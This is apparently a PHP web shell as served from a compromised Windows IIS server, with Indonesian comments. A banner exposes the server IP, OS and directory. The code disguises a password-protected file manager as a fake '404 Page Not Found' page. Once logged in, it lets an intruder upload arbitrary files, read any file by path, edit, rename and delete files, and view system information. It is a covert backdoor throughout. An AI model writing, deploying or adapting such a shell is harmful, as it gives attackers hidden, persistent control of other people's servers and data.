| Server IP : 122.154.253.140 / Your IP : 216.73.216.103 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/activity/20220929-193056/ |
Upload File : |
<?php
session_start(); // Memulai sesi
// Anti-cache header agar Cloudflare dan browser tidak menyimpan cache (untuk menghindari masalah session)
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
// Hash MD5 dari password yang disimpan
$stored_password_hash = 'ff54ecea5e454a41bb82a833ea1666fc'; // Hash untuk "password"
// Cek jika form di-submit
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
// Proses logout (hanya jika tombol logout ditekan dan user sudah login)
if (isset($_POST['logout']) && isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
session_unset(); // Hapus semua data session
session_destroy(); // Hancurkan session
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Proses login (hanya jika user belum login)
if (isset($_POST['password']) && !isset($_SESSION['loggedin'])) {
$input_password = $_POST['password']; // Ambil password dari input
$input_password_hash = md5($input_password); // Hash password yang dimasukkan
// Bandingkan hash yang dihasilkan dengan hash yang disimpan
if ($input_password_hash === $stored_password_hash) {
$_SESSION['loggedin'] = true; // Login sukses
echo '<font color="green">Login berhasil!</font><br>';
} else {
echo '<font color="red">Password salah!</font><br>';
}
}
// Proses pembuatan folder (hanya jika sudah login)
if (isset($_POST['create_folder']) && isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
$folder_name = $_POST['folder_name'];
$current_path = $_POST['current_path']; // Ambil path saat ini
if (!empty($folder_name)) {
$new_folder_path = rtrim($current_path, '/') . '/' . $folder_name;
if (mkdir($new_folder_path)) {
echo "<br><font color='green'>Folder '$folder_name' berhasil dibuat di '$current_path'.</font><br/>";
} else {
echo "<br><font color='red'>Gagal membuat folder.</font><br/>";
}
}
}
}
// Cek apakah pengguna sudah login
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
// Pengguna sudah login; tampilkan tombol logout dan form untuk membuat folder
echo '<form method="POST" action="">
<input type="submit" name="logout" value="Logout">
</form>';
// Tentukan path saat ini dari parameter GET "j" atau gunakan direktori kerja (getcwd)
$current_path = isset($_GET['j']) ? $_GET['j'] : getcwd();
echo '<form method="POST">
Nama Folder: <input type="text" name="folder_name" required>
<input type="hidden" name="current_path" value="' . htmlspecialchars($current_path) . '">
<input type="submit" name="create_folder" value="Buat Folder">
</form>';
} else {
// Tampilkan form login dengan tampilan "404 Page Not Found"
echo '<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">
::selection { background-color: #E13300; color: white; }
::moz-selection { background-color: #E13300; color: white; }
::webkit-selection { background-color: #E13300; color: white; }
body { background-color: #fff; margin: 40px; font: 13px/20px normal Helvetica, Arial, sans-serif; color: #4F5155; }
a { color: #003399; background-color: transparent; font-weight: normal; }
h1 { color: #444; background-color: transparent; border-bottom: 1px solid #D0D0D0; font-size: 19px; font-weight: normal; margin: 0 0 14px 0; padding: 14px 15px 10px 15px; }
code { font-family: Consolas, Monaco, Courier New, Courier, monospace; font-size: 12px; background-color: #f9f9f9; border: 1px solid #D0D0D0; color: #002166; display: block; margin: 14px 0 14px 0; padding: 12px 10px 12px 10px; }
#container { margin: 10px; border: 1px solid #D0D0D0; -webkit-box-shadow: 0 0 8px #D0D0D0; }
p { margin: 12px 15px 12px 15px; }
</style>
</head>
<body>
<div id="container">
<h1>404 Page Not Found</h1>
<p>The page you requested was not found.</p>
</div>
<center>
<form method="POST" action="">
<input type="password" name="password" placeholder="Password">
<input type="submit" value="Login">
</form>
</center>
</body>
</html>';
exit; // Hentikan eksekusi agar halaman file manager tidak ditampilkan
}
?>
<!DOCTYPE html>
<html>
<head>
<title>File Management</title>
</head>
<body>
<center>
<table width="100%" border="0" cellpadding="0" cellspacing="0" align="center">
<?php
// Tampilkan informasi sistem
echo "<font color='green'>" . php_uname() . "</font></tr></td></center></table>";
echo '<table width="100%" border="0" cellpadding="0" cellspacing="0" align="center">
<tr align="center"><td align="center"><br>';
// Tentukan direktori saat ini (dari GET atau default ke getcwd)
if (isset($_GET['j'])) {
$j = $_GET['j'];
} else {
$j = getcwd();
}
$j = str_replace('\\', '/', $j);
$paths = explode('/', $j);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
echo '<a href="?j=/">/</a>';
continue;
}
if ($pat == '') continue;
echo '<a href="?j=';
for ($i = 0; $i <= $id; $i++) {
echo "$paths[$i]";
if ($i != $id) echo "/";
}
echo '">' . htmlspecialchars($pat) . '</a>/';
}
echo '<br><br><br><font color="black">
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file" style="color:black;" required/>
<input type="submit" value="U" style="width:85px;height:25px"/>
</form>
</font>';
if (isset($_FILES['file'])) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $j . '/' . basename($_FILES['file']['name']))) {
echo '<br><br><font color="green">OK</font><br/>';
} else {
echo '<script>alert("NO")</script>';
}
}
echo '</td></tr>';
if (isset($_GET['filesrc'])) {
echo "<tr><td> ";
echo htmlspecialchars($_GET['filesrc']);
echo '</td></tr></table><br />';
echo('<textarea style="font-size: 8px; border: 1px solid white; background-color: green; color: white; width: 100%;height: 1200px;" readonly>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea>');
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . htmlspecialchars($_POST['j']) . '<br /><br />';
if ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&j=' . htmlspecialchars($cwd) . '&opt=delete&type=buat" method="POST">
<input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>
<input type="hidden" name="j" value="' . htmlspecialchars($cwd) . '">
<input type="hidden" name="opt" value="delete">
<input type="submit" value=">>>" style="width:100px; height: 30px;"/>
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['j'], dirname($_POST['j']) . '/' . $_POST['newname'])) {
echo '<br><br><font color="green">OK</font><br/>';
} else {
echo '<script>alert("NO")</script>';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<input name="newname" type="text" size="5" style="width:20%; height:30px;" value="' . htmlspecialchars($_POST['name']) . '" />
<input type="hidden" name="j" value="' . htmlspecialchars($_POST['j']) . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value=">>>" style="height:30px;" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['j'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<br><br><font color="green">OK</font><br/>';
} else {
echo '<script>alert("NO")</script>';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: green; color: white; width: 100%;height: 1000px;">' . htmlspecialchars(file_get_contents($_POST['j'])) . '</textarea><br />
<input type="hidden" name="j" value="' . htmlspecialchars($_POST['j']) . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value=">>>" style="height:30px; width:70px;"/>
</form>';
}
echo '</center>';
} else {
echo '</table><br /><center>';
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'g') {
if (rmdir($_POST['j'])) {
echo '<br><br><font color="green">OK</font><br/>';
} else {
echo '<script>alert("NO")</script>';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['j'])) {
echo '<br><br><font color="green">OK</font><br/>';
} else {
echo '<script>alert("NO")</script>';
}
}
}
}
?>
<?php
echo '</center>';
$scandir = scandir($j);
echo '<div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>';
foreach ($scandir as $g) {
if (!is_dir("$j/$g") || $g == '.' || $g == '..') continue;
echo "<tr>
<td class=td_home>D<a href=\"?j=$j/$g\"> $g</a></td>
<td class=td_home><center>D</center></td>
<td class=td_home><center>";
if (is_writable("$j/$g")) echo '<font color="black">';
elseif (!is_readable("$j/$g")) echo '<font color="red">';
echo z("$j/$g");
if (is_writable("$j/$g") || !is_readable("$j/$g")) echo '</font>';
echo "</center></td>
<td class=td_home align=right> <form method=\"POST\" action=\"?option&j=$j\">
<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15\">
<option value=\"Action\">+</option>
<option value=\"delete\">Delete</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"g\">
<input type=\"hidden\" name=\"j\" value=\"$j/$g\">
<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15\"/>
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach ($scandir as $file) {
if (!is_file("$j/$file")) continue;
$size = filesize("$j/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size = $size . ' KB';
}
echo "<tr>
<td class=td_home>F<a href=\"?filesrc=$j/$file&j=$j\"> $file</a></td>
<td class=td_home><center>" . htmlspecialchars($size) . "</center></td>
<td class=td_home><center>";
if (is_writable("$j/$file")) echo '<font color="green">';
elseif (!is_readable("$j/$file")) echo '<font color="red">';
echo z("$j/$file");
if (is_writable("$j/$file") || !is_readable("$j/$file")) echo '</font>';
echo "</center></td>
<td class=td_home align=right> <form method=\"POST\" action=\"?option&j=$j\">
<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15\">
<option value=\"Action\">+</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"j\" value=\"$j/$file\">
<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15\"/>
</form></center></td>
</tr>";
}
echo '</table>
</div>';
function z($file) {
$z = fileperms($file);
$info = '';
if (($z & 0xC000) == 0xC000) {
$info = 's';
} elseif (($z & 0xA000) == 0xA000) {
$info = '4';
} elseif (($z & 0x8000) == 0x8000) {
$info = '0';
} elseif (($z & 0x6000) == 0x6000) {
$info = '3';
} elseif (($z & 0x4000) == 0x4000) {
$info = '3';
} elseif (($z & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($z & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = '5';
}
$info .= (($z & 0x0100) ? '2' : '0');
$info .= (($z & 0x0080) ? '1' : '0');
$info .= (($z & 0x0040) ? (($z & 0x0800) ? 's' : '6') : (($z & 0x0800) ? 'S' : '0'));
$info .= (($z & 0x0020) ? '2' : '0');
$info .= (($z & 0x0010) ? '1' : '0');
$info .= (($z & 0x0008) ? (($z & 0x0400) ? 's' : '6') : (($z & 0x0400) ? 'S' : '0'));
$info .= (($z & 0x0004) ? '2' : '0');
$info .= (($z & 0x0002) ? '1' : '0');
$info .= (($z & 0x0001) ? (($z & 0x0200) ? 't' : '6') : (($z & 0x0200) ? 'T' : '0'));
return $info;
}
?>